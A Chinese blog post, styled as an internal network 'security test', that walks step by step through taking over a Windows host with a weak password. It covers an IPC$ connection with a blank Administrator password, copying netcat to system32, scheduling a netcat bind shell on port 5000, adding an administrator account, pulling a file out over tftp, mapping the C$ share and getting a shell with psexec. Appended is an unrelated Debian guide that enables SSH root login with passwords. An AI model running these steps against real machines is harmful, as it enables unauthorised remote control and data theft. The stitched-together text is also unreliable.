局域网内部安全测试--------利用弱密码控制远程计算机

本文通过实战案例介绍如何使用X-Scan等工具进行内部网络扫描,发现并利用弱密码漏洞,建立IPC连接,并通过多种手段如复制文件、添加用户、执行远程命令等方式获取目标主机的控制权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

先扫描内部网段(网上扫描软件很多,我习惯用X-Scan),获得弱密码

可以看到现在已经扫描出来许多弱密码,可以进一步控制

首先和对方建立连接
net use //10.1.12.84/ipc$ "" /user:"Administrator" 命令成功完成。
这是和ip为10.1.12.84的计算机建立IPC连接

copy nc.exe //10.1.12.84/admin$/system32,    nc.exe是一个获得控制台木马的服务器端。
复制一个文件到对方计算机的system32目录下面
这里复制的是一个telnet类连接工具。
nc是netcat的简写,通常称为黑客界的"瑞士军刀",功能比较强大。

net time //10.1.12.84
查看对方计算机时间,以便利用计划任务   上午 08:40

at //10.1.12.84 08:42 nc -l -p 5000 -e cmd.exe
新加了一项作业,其作业 ID = 1
添加一个任务,在08:42运行;运行之后将开放一个端口:5000
可以通过这个端口获得一个shell ,即控制台

运行之后就可以连接了
nc 10.1.12.84 5000
和对方计算机连接。本地的nc.exe 和对方的nc.exe 建立连接,获得一个shell.

出现C:/WINDOWS/system32>
现在就成功进入了对方计算机,管理员权限。

 

现在测试一下能否在对方计算机上执行命令

查看用户
net user
3个用户

添加一个用户试试。
net user testuser testpass /add
命令成功完成

查看用户
net user
4个用户

将添加的用户加入管理员组。
net localgroup administrators testuser /add
命令成功完成

看看刚添加的用户情况
net user testuser
管理员Administrators组

删除用户
net user testuser /del

ipconfig 看它的IP :  10.1.12.84

窃取资料
dir c:/
假设现在要c:/SOUND.LOG
先在本地架设tftp服务器
tftp -i 10.1.16.148 put c:/sound.log
成功传回

 

退出。

再测试一下磁盘映射,现在我的电脑的硬盘分区为C D E F
net use x: //10.1.16.148/c$
查看我的电脑,多了一个x盘。
现在操作对方文件如同操作自己计算机上的文件一样。
x盘实际上就是对方的c盘
删除映射
net use x: /del


利用管道工具psexec可以直接在建立IPC连接之后快速地取得控制权
psexec.exe //10.1.12.84 cmd
出现了shell,又进去了!
C:/WINDOWS/system32>

退出!

删除连接
net use //10.1.12.84/ipc$ /del

演示结束,谢谢 !

### 创建并配置 Debian 12.1.0 虚拟机 #### 新建虚拟机 为了创建新的 Debian 12.1.0 虚拟机,需按照所使用的虚拟化平台(如 VirtualBox 或 VMware)的具体指导完成安装过程。确保选择合适的硬件资源分配给虚拟机以保障性能。 #### 启动虚拟机并进入命令行界面 启动刚创建好的 Debian 12.1.0 虚拟机,在首次引导过程中会提示进行初始设置,包括但不限于主机名、时区以及用户账户的建立等操作[^1]。 #### 查看虚拟机 IP 地址 一旦成功部署并运行了操作系统,则可以通过执行 `ip addr` 命令来获取当前系统的网络接口详情及其对应的 IPv4/IPv6 地址信息: ```bash ip addr show ``` 如果发现缺少有效的 IP 分配,可能是因为 DHCP 客户端未能正常工作或是物理网卡未被激活;此时可以尝试重启网络服务或者手动指定静态 IP 设置[^3]。 #### 测试网络连通性 确认获得了正确的 IP 地址之后,可利用 ping 工具验证外部可达性和内部局域网内的其他设备之间的通信状况: ```bash ping www.example.com ``` 这一步骤有助于排除任何潜在的基础架构层面的问题,比如 DNS 解析失败或者是防火墙阻止流量等问题。 #### 安装 OpenSSH Server 并允许 Root 登录 对于希望实现基于 SSH 的远程管理而言,先要确保已安装 openssh-server 包件: ```bash sudo apt update && sudo apt install -y openssh-server ``` 编辑 `/etc/ssh/sshd_config` 文件调整如下参数以便支持 root 用户直接登录: ```diff PermitRootLogin yes PasswordAuthentication yes ChallengeResponseAuthentication no UsePAM yes X11Forwarding yes PrintMotd no AcceptEnv LANG LC_* Subsystem sftp /usr/lib/openssh/sftp-server ``` 保存更改后记得重启 ssh 服务使修改生效: ```bash sudo systemctl restart ssh ``` 注意上述做法存在一定的安全隐患,因此建议采取额外的安全防护措施,例如限制特定 IP 访问、定期更换强密码等方式降低风险水平[^2]。 #### 使用客户端工具连接到目标机器 最后,在另一台计算机上打开终端窗口输入类似下面这样的指令来进行实际测试: ```bash ssh root@<your_debian_vm_ip> ``` 替换 `<your_debian_vm_ip>` 为之前查询所得的真实数值即可尝试登陆该服务器实例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值